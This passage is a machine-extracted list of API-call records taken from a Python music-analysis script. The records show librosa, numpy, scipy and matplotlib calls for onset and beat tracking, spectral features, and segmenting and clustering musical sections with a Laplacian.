'librosa.util.fix_frames', 'librosa.util.fix_frames', (['onset_raw'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(onset_raw, x_min=0, x_max=M.shape[1] - 1)\n', (2596, 2638), False, 'import librosa\n'), ((2652, 2712), 'librosa.frames_to_time', 'librosa.frames_to_time', (['onset_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(onset_frames, sr=sr, hop_length=STEP)\n', (2674, 2712), False, 'import librosa\n'), ((2784, 2836), 'librosa.util.sync', 'librosa.util.sync', (['M', 'onset_raw'], {'aggregate': 'np.median'}), '(M, onset_raw, aggregate=np.median)\n', (2801, 2836), False, 'import librosa\n'), ((3701, 3765), 'librosa.beat.beat_track', 'librosa.beat.beat_track', ([], {'y': 'y', 'sr': 'sr', 'hop_length': 'STEP', 'trim': '(False)'}), '(y=y, sr=sr, hop_length=STEP, trim=False)\n', (3724, 3765), False, 'import librosa\n'), ((4033, 4094), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['beats'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(beats, x_min=0, x_max=M.shape[1] - 1)\n', (4056, 4094), False, 'import librosa\n'), ((4107, 4167), 'librosa.frames_to_time', 'librosa.frames_to_time', (['beats_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(beats_frames, sr=sr, hop_length=STEP)\n', (4129, 4167), False, 'import librosa\n'), ((4180, 4235), 'librosa.util.sync', 'librosa.util.sync', (['M', 'beats_frames'], {'aggregate': 'np.median'}), '(M, beats_frames, aggregate=np.median)\n', (4197, 4235), False, 'import librosa\n'), ((4956, 4980), 'numpy.arange', 'np.arange', (['(0)', 'M.shape[1]'], {}), '(0, M.shape[1])\n', (4965, 4980), True, 'import numpy as np\n'), ((4996, 5041), 'librosa.samples_to_time', 'librosa.samples_to_time', (['onsets'], {'sr': '(sr / STEP)'}), '(onsets, sr=sr / STEP)\n', (5019, 5041), False, 'import librosa\n'), ((5520, 5582), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['frames'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(frames, x_min=0, x_max=M.shape[1] - 1)\n', (5543, 5582), False, 'import librosa\n'), ((5596, 5650), 'librosa.frames_to_time', 'librosa.frames_to_time', (['onsets'], {'sr': 'sr', 'hop_length': 'STEP'}), '(onsets, sr=sr, hop_length=STEP)\n', (5618, 5650), False, 'import librosa\n'), ((5663, 5712), 'librosa.util.sync', 'librosa.util.sync', (['M', 'onsets'], {'aggregate': 'np.median'}), '(M, onsets, aggregate=np.median)\n', (5680, 5712), False, 'import librosa\n'), ((7478, 7550), 'librosa.segment.recurrence_matrix', 'librosa.segment.recurrence_matrix', (['M'], {'width': '(3)', 'mode': '"""affinity"""', 
'sym': '(True)'}), "(M, width=3, mode='affinity', sym=True)\n", (7511, 7550), False, 'import librosa\n'), ((7599, 7658), 'librosa.segment.timelag_filter', 'librosa.segment.timelag_filter', (['scipy.ndimage.median_filter'], {}), '(scipy.ndimage.median_filter)\n', (7629, 7658), False, 'import librosa\n'), ((7883, 7927), 'librosa.util.sync', 'librosa.util.sync', (['M', 'x'], {'aggregate': 'np.median'}), '(M, x, aggregate=np.median)\n', (7900, 7927), False, 'import librosa\n'), ((8028, 8040), 'sklearn.preprocessing.scale', 'scale', (['Msync'], {}), '(Msync)\n', (8033, 8040), False, 'from sklearn.preprocessing import scale\n'), ((8200, 8224), 'numpy.median', 'np.median', (['path_distance'], {}), '(path_distance)\n', (8209, 8224), True, 'import numpy as np\n'), ((8237, 8267), 'numpy.exp', 'np.exp', (['(-path_distance / sigma)'], {}), '(-path_distance / sigma)\n', (8243, 8267), True, 'import numpy as np\n'), ((8607, 8629), 'numpy.sum', 'np.sum', (['R_path'], {'axis': '(1)'}), '(R_path, axis=1)\n', (8613, 8629), True, 'import numpy as np\n'), ((8641, 8659), 'numpy.sum', 'np.sum', (['Rf'], {'axis': '(1)'}), '(Rf, axis=1)\n', (8647, 8659), True, 'import numpy as np\n'), ((8945, 8991), 'scipy.sparse.csgraph.laplacian', 'scipy.sparse.csgraph.laplacian', (['A'], {'normed': '(True)'}), '(A, normed=True)\n', (8975, 8991), False, 'import scipy\n'), ((9106, 9123), 'numpy.linalg.eigh', 'np.linalg.eigh', (['L'], {}), '(L)\n', (9120, 9123), True, 'import numpy as np\n'), ((9267, 9314), 'scipy.ndimage.median_filter', 'scipy.ndimage.median_filter', (['evecs'], {'size': '(9, 1)'}), '(evecs, size=(9, 1))\n', (9294, 9314), False, 'import scipy\n'), ((12099, 12117), 'numpy.zeros', 'np.zeros', (['n_labels'], {}), '(n_labels)\n', (12107, 12117), True, 'import numpy as np\n'), ((12786, 12813), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (12796, 12813), True, 'import matplotlib.pyplot as plt\n'), ((12815, 12835), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(1)'], {}), '(1, 3, 1)\n', (12826, 12835), True, 'import matplotlib.pyplot as plt\n'), ((12837, 12925), 'librosa.display.specshow', 'librosa.display.specshow', (['Rf'], {'cmap': '"""inferno_r"""', 'y_axis': '"""time"""', 'y_coords': 'onset_times'}), "(Rf, cmap='inferno_r', y_axis='time', y_coords=\n onset_times)\n", (12861, 12925), False, 'import librosa\n'), ((12922, 12974), 'matplotlib.pyplot.title', 'plt.title', (['"""Long-range recurrence similarity (Rrec)"""'], {}), "('Long-range recurrence similarity (Rrec)')\n", (12931, 12974), True, 'import matplotlib.pyplot as plt\n'), ((12976, 12996), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(2)'], {}), '(1, 3, 2)\n', (12987, 12996), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13048), 'librosa.display.specshow', 'librosa.display.specshow', (['R_path'], {'cmap': '"""inferno_r"""'}), "(R_path, cmap='inferno_r')\n", (13022, 13048), False, 'import librosa\n'), ((13050, 13091), 'matplotlib.pyplot.title', 'plt.title', (['"""Local path similarity (Rloc)"""'], {}), "('Local path similarity (Rloc)')\n", (13059, 13091), True, 'import matplotlib.pyplot as plt\n'), ((13093, 13113), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(3)'], {}), '(1, 3, 3)\n', (13104, 13113), True, 'import matplotlib.pyplot as plt\n'), ((13115, 13160), 'librosa.display.specshow', 'librosa.display.specshow', (['A'], {'cmap': '"""inferno_r"""'}), "(A, cmap='inferno_r')\n", (13139, 13160), False, 'import librosa\n'), ((13162, 13215), 
'matplotlib.pyplot.title', 'plt.title', (['"""Combined graph (A = m Rrec + (1-m) Rloc)"""'], {}), "('Combined graph (A = m Rrec + (1-m) Rloc)')\n", (13171, 13215), True, 'import matplotlib.pyplot as plt\n'), ((13217, 13235), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (13233, 13235), True, 'import matplotlib.pyplot as plt\n'), ((13301, 13328), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (13311, 13328), True, 'import matplotlib.pyplot as plt\n'), ((13339, 13364), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""Paired"""', 'k'], {}), "('Paired', k)\n", (13351, 13364), True, 'import matplotlib.pyplot as plt\n'), ((13403, 13449), 'librosa.display.specshow', 'librosa.display.specshow', (['Rf'], {'cmap': '"""inferno_r"""'}), "(Rf, cmap='inferno_r')\n", (13427, 13449), False, 'import librosa\n'), ((13546, 13610), 'librosa.display.specshow', 'librosa.display.specshow', (['X'], {'y_axis': '"""time"""', 'y_coords': 'onset_times'}), "(X, y_axis='time', y_coords=onset_times)\n", (13570, 13610), False, 'import librosa\n'), ((13839, 13857), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (13855, 13857), True, 'import matplotlib.pyplot as plt\n'), ((14445, 14494), 'librosa.util.sync', 'librosa.util.sync', (['X', 'onsets'], {'aggregate': 'np.median'}), '(X, onsets, aggregate=np.median)\n', (14462, 14494), False, 'import librosa\n'), ((16273, 16328), 'librosa.load', 'librosa.load', (['filename'], {'offset': 'start', 'duration': 'duration'}), '(filename, offset=start, duration=duration)\n', (16285, 16328), False, 'import librosa\n'), ((18975, 19020), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['bound_beats'], {'x_min': '(0)'}), '(bound_beats, x_min=0)\n', (18998, 19020), False, 'import librosa\n'), ((19250, 19320), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['bound_frames'], {'x_min': 'None', 'x_max': '(nb_frames - 1)'}), '(bound_frames, x_min=None, x_max=nb_frames - 1)\n', (19273, 19320), False, 'import librosa\n'), ((19335, 19395), 'librosa.frames_to_time', 'librosa.frames_to_time', (['bound_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(bound_frames, sr=sr, hop_length=STEP)\n', (19357, 19395), False, 'import librosa\n'), ((19909, 19940), 'numpy.zeros', 'np.zeros', (['center_clusters.shape'], {}), '(center_clusters.shape)\n', (19917, 19940), True, 'import numpy as np\n'), ((20347, 20375), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(5, 4)'}), '(figsize=(5, 4))\n', (20359, 20375), True, 'import matplotlib.pyplot as plt\n'), ((20652, 20670), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (20668, 20670), True, 'import matplotlib.pyplot as plt\n'), ((20739, 20815), 'numpy.where', 'np.where', (['((onset_times >= params.begin_ref) & (onset_times < params.end_ref))'], {}), '((onset_times >= params.begin_ref) & (onset_times < params.end_ref))\n', (20747, 20815), True, 'import numpy as np\n'), ((20860, 21017), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)"""'}), "(description=\n 'Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)'\n )\n", (20883, 21017), False, 'import argparse\n'), ((23154, 23195), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3 + 2 * N_CLUST)'}), '(figsize=(12, 3 + 2 * N_CLUST))\n', (23164, 23195), True, 
'import matplotlib.pyplot as plt\n'), ((23299, 23350), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1 + N_CLUST)', '(1)'], {'height_ratios': 'hr'}), '(1 + N_CLUST, 1, height_ratios=hr)\n', (23316, 23350), False, 'from matplotlib import gridspec\n'), ((23385, 23531), 'librosa.display.specshow', 'librosa.display.specshow', (['Csync'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Csync, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)\n", (23409, 23531), False, 'import librosa\n'), ((26648, 26666), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (26664, 26666), True, 'import matplotlib.pyplot as plt\n'), ((26668, 26678), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (26676, 26678), True, 'import matplotlib.pyplot as plt\n'), ((2863, 2890), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (2873, 2890), True, 'import matplotlib.pyplot as plt\n'), ((2893, 2931), 'matplotlib.pyplot.plot', 'plt.plot', (['oenv'], {'label': '"""Onset strength"""'}), "(oenv, label='Onset strength')\n", (2901, 2931), True, 'import matplotlib.pyplot as plt\n'), ((3063, 3104), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'frameon': '(True)', 'framealpha': '(0.75)'}), '(frameon=True, framealpha=0.75)\n', (3073, 3104), True, 'import matplotlib.pyplot as plt\n'), ((3107, 3125), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3123, 3125), True, 'import matplotlib.pyplot as plt\n'), ((3129, 3156), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (3139, 3156), True, 'import matplotlib.pyplot as plt\n'), ((3159, 3179), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (3170, 3179), True, 'import matplotlib.pyplot as plt\n'), ((3180, 3208), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (3189, 3208), True, 'import matplotlib.pyplot as plt\n'), ((3211, 3331), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (3235, 3331), False, 'import librosa\n'), ((3331, 3349), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3347, 3349), True, 'import matplotlib.pyplot as plt\n'), ((3353, 3373), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (3364, 3373), True, 'import matplotlib.pyplot as plt\n'), ((3374, 3425), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on onsets"""'], {}), "('CQT spectrogram synchronized on onsets')\n", (3383, 3425), True, 'import matplotlib.pyplot as plt\n'), ((3428, 3551), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=onset_times)\n", (3452, 3551), False, 'import librosa\n'), ((3549, 3567), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3565, 3567), True, 'import matplotlib.pyplot as plt\n'), ((3844, 3897), 
'librosa.frames_to_time', 'librosa.frames_to_time', (['beats'], {'sr': 'sr', 'hop_length': 'STEP'}), '(beats, sr=sr, hop_length=STEP)\n', (3866, 3897), False, 'import librosa\n'), ((4261, 4288), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (4271, 4288), True, 'import matplotlib.pyplot as plt\n'), ((4291, 4311), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (4302, 4311), True, 'import matplotlib.pyplot as plt\n'), ((4312, 4340), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (4321, 4340), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4463), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (4367, 4463), False, 'import librosa\n'), ((4462, 4480), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4478, 4480), True, 'import matplotlib.pyplot as plt\n'), ((4622, 4642), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (4633, 4642), True, 'import matplotlib.pyplot as plt\n'), ((4643, 4693), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on beats"""'], {}), "('CQT spectrogram synchronized on beats')\n", (4652, 4693), True, 'import matplotlib.pyplot as plt\n'), ((4696, 4818), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'beat_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=beat_times)\n", (4720, 4818), False, 'import librosa\n'), ((4816, 4834), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4832, 4834), True, 'import matplotlib.pyplot as plt\n'), ((5066, 5093), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (5076, 5093), True, 'import matplotlib.pyplot as plt\n'), ((5096, 5124), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (5105, 5124), True, 'import matplotlib.pyplot as plt\n'), ((5127, 5253), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(M, y_axis='cqt_hz', sr=sr, bins_per_octave=\n BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)\n", (5151, 5253), False, 'import librosa\n'), ((5251, 5269), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5267, 5269), True, 'import matplotlib.pyplot as plt\n'), ((5739, 5766), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (5749, 5766), True, 'import matplotlib.pyplot as plt\n'), ((5769, 5789), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (5780, 5789), True, 'import matplotlib.pyplot as plt\n'), ((5790, 5818), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (5799, 5818), True, 'import matplotlib.pyplot as plt\n'), ((5821, 5941), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 
'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (5845, 5941), False, 'import librosa\n'), ((5940, 5958), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5956, 5958), True, 'import matplotlib.pyplot as plt\n'), ((5962, 5982), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (5973, 5982), True, 'import matplotlib.pyplot as plt\n'), ((5983, 6033), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on beats"""'], {}), "('CQT spectrogram synchronized on beats')\n", (5992, 6033), True, 'import matplotlib.pyplot as plt\n'), ((6036, 6159), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=onset_times)\n", (6060, 6159), False, 'import librosa\n'), ((6157, 6175), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (6173, 6175), True, 'import matplotlib.pyplot as plt\n'), ((8386, 8408), 'numpy.diag', 'np.diag', (['path_sim'], {'k': '(1)'}), '(path_sim, k=1)\n', (8393, 8408), True, 'import numpy as np\n'), ((8411, 8434), 'numpy.diag', 'np.diag', (['path_sim'], {'k': '(-1)'}), '(path_sim, k=-1)\n', (8418, 8434), True, 'import numpy as np\n'), ((8701, 8734), 'numpy.sum', 'np.sum', (['((deg_path + deg_rec) ** 2)'], {}), '((deg_path + deg_rec) ** 2)\n', (8707, 8734), True, 'import numpy as np\n'), ((9410, 9439), 'numpy.cumsum', 'np.cumsum', (['(evecs ** 2)'], {'axis': '(1)'}), '(evecs ** 2, axis=1)\n', (9419, 9439), True, 'import numpy as np\n'), ((12508, 12535), 'numpy.allclose', 'np.allclose', (['intra_dists', '(0)'], {}), '(intra_dists, 0)\n', (12519, 12535), True, 'import numpy as np\n'), ((12539, 12573), 'numpy.allclose', 'np.allclose', (['centroid_distances', '(0)'], {}), '(centroid_distances, 0)\n', (12550, 12573), True, 'import numpy as np\n'), ((12706, 12730), 'numpy.nanmax', 'np.nanmax', (['score'], {'axis': '(1)'}), '(score, axis=1)\n', (12715, 12730), True, 'import numpy as np\n'), ((14022, 14067), 'numpy.min', 'np.min', (['[onset_times[-1], onset_times[n] + w]'], {}), '([onset_times[-1], onset_times[n] + w])\n', (14028, 14067), True, 'import numpy as np\n'), ((14075, 14120), 'numpy.min', 'np.min', (['[onset_times[-1] - w, onset_times[n]]'], {}), '([onset_times[-1] - w, onset_times[n]])\n', (14081, 14120), True, 'import numpy as np\n'), ((14128, 14178), 'numpy.where', 'np.where', (['((onset_times < t1) & (onset_times >= t2))'], {}), '((onset_times < t1) & (onset_times >= t2))\n', (14136, 14178), True, 'import numpy as np\n'), ((14216, 14233), 'numpy.max', 'np.max', (['C[:, idw]'], {}), '(C[:, idw])\n', (14222, 14233), True, 'import numpy as np\n'), ((14298, 14342), 'numpy.where', 'np.where', (['(C[:, n] > alpha * threshold_chroma)'], {}), '(C[:, n] > alpha * threshold_chroma)\n', (14306, 14342), True, 'import numpy as np\n'), ((14590, 14617), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (14600, 14617), True, 'import matplotlib.pyplot as plt\n'), ((14749, 14859), 'librosa.display.specshow', 'librosa.display.specshow', (['Xsync[:12, :]'], {'y_axis': '"""chroma"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times', 'cmap': '"""OrRd"""'}), "(Xsync[:12, :], y_axis='chroma', x_axis='time',\n x_coords=onset_times, cmap='OrRd')\n", (14773, 14859), 
False, 'import librosa\n'), ((15388, 15406), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (15404, 15406), True, 'import matplotlib.pyplot as plt\n'), ((16428, 16451), 'librosa.effects.hpss', 'librosa.effects.hpss', (['y'], {}), '(y)\n', (16448, 16451), False, 'import librosa\n'), ((16454, 16516), 'librosa.output.write_wav', 'librosa.output.write_wav', (["(filename + '_harmo.wav')", 'y_harmo', 'sr'], {}), "(filename + '_harmo.wav', y_harmo, sr)\n", (16478, 16516), False, 'import librosa\n'), ((16519, 16581), 'librosa.output.write_wav', 'librosa.output.write_wav', (["(filename + '_percu.wav')", 'y_percu', 'sr'], {}), "(filename + '_percu.wav', y_percu, sr)\n", (16543, 16581), False, 'import librosa\n'), ((16768, 16821), 'librosa.estimate_tuning', 'librosa.estimate_tuning', ([], {'y': 'y', 'sr': 'sr', 'resolution': '(0.001)'}), '(y=y, sr=sr, resolution=0.001)\n', (16791, 16821), False, 'import librosa\n'), ((17032, 17104), 'librosa.feature.mfcc', 'librosa.feature.mfcc', ([], {'y': 'y', 'sr': 'sr', 'n_mfcc': '(20)', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_mfcc=20, n_fft=NFFT, hop_length=STEP)\n', (17052, 17104), False, 'import librosa\n'), ((17126, 17153), 'librosa.feature.delta', 'librosa.feature.delta', (['mfcc'], {}), '(mfcc)\n', (17147, 17153), False, 'import librosa\n'), ((17163, 17205), 'numpy.concatenate', 'np.concatenate', (['(mfcc, mfcc_delta)'], {'axis': '(0)'}), '((mfcc, mfcc_delta), axis=0)\n', (17177, 17205), True, 'import numpy as np\n'), ((17267, 17384), 'librosa.feature.chroma_cqt', 'librosa.feature.chroma_cqt', ([], {'y': 'y', 'sr': 'sr', 'n_chroma': '(12)', 'n_octaves': 'N_OCTAVES', 'hop_length': 'STEP', 'norm': 'None', 'tuning': 'A440'}), '(y=y, sr=sr, n_chroma=12, n_octaves=N_OCTAVES,\n hop_length=STEP, norm=None, tuning=A440)\n', (17293, 17384), False, 'import librosa\n'), ((17407, 17436), 'librosa.feature.delta', 'librosa.feature.delta', (['chroma'], {}), '(chroma)\n', (17428, 17436), False, 'import librosa\n'), ((17446, 17492), 'numpy.concatenate', 'np.concatenate', (['(chroma, chroma_delta)'], {'axis': '(0)'}), '((chroma, chroma_delta), axis=0)\n', (17460, 17492), True, 'import numpy as np\n'), ((17583, 17657), 'librosa.feature.spectral_centroid', 'librosa.feature.spectral_centroid', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP)\n', (17616, 17657), False, 'import librosa\n'), ((17675, 17764), 'librosa.feature.spectral_contrast', 'librosa.feature.spectral_contrast', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'n_bands': '(6)', 'hop_length': 'STEP'}), '(y=y, sr=sr, n_fft=NFFT, n_bands=6,\n hop_length=STEP)\n', (17708, 17764), False, 'import librosa\n'), ((17778, 17845), 'librosa.feature.spectral_flatness', 'librosa.feature.spectral_flatness', ([], {'y': 'y', 'n_fft': 'NFFT', 'hop_length': 'STEP'}), '(y=y, n_fft=NFFT, hop_length=STEP)\n', (17811, 17845), False, 'import librosa\n'), ((17864, 17960), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.05)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.05)\n', (17896, 17960), False, 'import librosa\n'), ((17977, 18073), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.25)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.25)\n', (18009, 18073), False, 'import librosa\n'), 
((18090, 18185), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.5)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.5)\n', (18122, 18185), False, 'import librosa\n'), ((18203, 18299), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.75)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.75)\n', (18235, 18299), False, 'import librosa\n'), ((18316, 18412), 'librosa.feature.spectral_rolloff', 'librosa.feature.spectral_rolloff', ([], {'y': 'y', 'sr': 'sr', 'n_fft': 'NFFT', 'hop_length': 'STEP', 'roll_percent': '(0.95)'}), '(y=y, sr=sr, n_fft=NFFT, hop_length=STEP,\n roll_percent=0.95)\n', (18348, 18412), False, 'import librosa\n'), ((18424, 18537), 'numpy.concatenate', 'np.concatenate', (['(centroid, contrast, flatness, rolloff05, rolloff25, rolloff50, rolloff75,\n rolloff95)'], {'axis': '(0)'}), '((centroid, contrast, flatness, rolloff05, rolloff25,\n rolloff50, rolloff75, rolloff95), axis=0)\n', (18438, 18537), True, 'import numpy as np\n'), ((18545, 18572), 'librosa.feature.delta', 'librosa.feature.delta', (['spec'], {}), '(spec)\n', (18566, 18572), False, 'import librosa\n'), ((18583, 18625), 'numpy.concatenate', 'np.concatenate', (['(spec, spec_delta)'], {'axis': '(0)'}), '((spec, spec_delta), axis=0)\n', (18597, 18625), True, 'import numpy as np\n'), ((18658, 18672), 'numpy.array', 'np.array', (['full'], {}), '(full)\n', (18666, 18672), True, 'import numpy as np\n'), ((18877, 18928), 'numpy.flatnonzero', 'np.flatnonzero', (['(cluster_ids[:-1] != cluster_ids[1:])'], {}), '(cluster_ids[:-1] != cluster_ids[1:])\n', (18891, 18928), True, 'import numpy as np\n'), ((25429, 25454), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""Paired"""', 'k'], {}), "('Paired', k)\n", (25441, 25454), True, 'import matplotlib.pyplot as plt\n'), ((3994, 4013), 'numpy.std', 'np.std', (['beat_period'], {}), '(beat_period)\n', (4000, 4013), True, 'import numpy as np\n'), ((8085, 8114), 'numpy.diff', 'np.diff', (['Msync_normed'], {'axis': '(1)'}), '(Msync_normed, axis=1)\n', (8092, 8114), True, 'import numpy as np\n'), ((13730, 13752), 'numpy.atleast_2d', 'np.atleast_2d', (['seg_ids'], {}), '(seg_ids)\n', (13743, 13752), True, 'import numpy as np\n'), ((15011, 15032), 'numpy.abs', 'np.abs', (['Xsync[12:, :]'], {}), '(Xsync[12:, :])\n', (15017, 15032), True, 'import numpy as np\n'), ((15454, 15481), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (15464, 15481), True, 'import matplotlib.pyplot as plt\n'), ((15568, 15644), 'librosa.display.specshow', 'librosa.display.specshow', (['Xsync[:21, :]'], {'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Xsync[:21, :], x_axis='time', x_coords=onset_times)\n", (15592, 15644), False, 'import librosa\n'), ((16123, 16141), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (16139, 16141), True, 'import matplotlib.pyplot as plt\n'), ((3972, 3992), 'numpy.mean', 'np.mean', (['beat_period'], {}), '(beat_period)\n', (3979, 